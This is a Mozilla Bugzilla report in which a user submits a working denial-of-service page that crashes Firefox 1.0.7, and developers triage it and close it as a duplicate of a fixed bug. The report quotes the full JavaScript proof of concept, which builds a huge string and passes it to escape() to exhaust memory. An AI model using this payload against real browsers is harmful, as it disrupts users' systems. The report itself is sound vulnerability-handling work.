Closed
Bug 312102
Opened 19 years ago
Closed 19 years ago
Working Denial of service exploit crashes Firefox 1.07
Categories
(Core :: JavaScript Engine, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 303213
People
(Reporter: jp.senior, Unassigned)
References
()
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
See the following:
http://www.triviasecurity.net/exploits/Mozilla_Firefox_%3C=_1.0.7_Integar_Overflow_Denial_of_Service_Exploit
Contains the source:
<html>
Copyright Georgi Guninski
<br>
Cannot be used in vulnerability databases
<br>
Especially securityfocus/mitre/cve/cert
<script>
var s=String.fromCharCode(257);
var ki="";
var me="";
for(i=0;i<1024;i++)
{ki=ki+s;}
for(i=0;i<1024;i++)
{me=me+ki;}
var ov=s;
for(i=0;i<28;i++) ov += ov;
for(i=0;i<88;i++) ov += me;
alert("done generating");
var fuckbill=escape(ov);
alert("done escape");
alert(fuckbill);
</script>
</html>
Reproducible: Always
Steps to Reproduce:
Actual Results:
Firefox immediately locked up
I had other people test this on various OS's. This is confirmed to work.
|
||
Comment 2•19 years ago
|
||
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20051010
Firefox/1.6a1
I don't see a crash or hang, but Firefox says "Out of memory" in the JavaScript
console during the escape() step. I never ese the "done escape" message. I
think "Out of memory" is bogus in this case, btw.
|
|
||
Comment 3•19 years ago
|
||
Same with Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12)
Gecko/20050914 Firefox/1.0.7.
|
|
||
Updated•19 years ago
|
|
|
||
Comment 4•19 years ago
|
||
With Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051007
Firefox/1.6a1, I get "out of memory" before it even gets to the "done
generating" message.
|
|
||
Comment 5•19 years ago
|
||
> I think "Out of memory" is bogus in this case, btw.
Never mind. After re-reading the script I see that it is generating a
ridiculously long string.
Assignee: nobody → general
Component: Security → JavaScript Engine
Product: Firefox → Core
QA Contact: firefox → general
Version: unspecified → 1.7 Branch
|
||
Comment 6•19 years ago
|
||
(In reply to comment #1)
> I had other people test this on various OS's. This is confirmed to work.
Define "work" -- we think we fixed this in 1.0.7
see bug 303213 and bug 305190
*** This bug has been marked as a duplicate of 303213 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•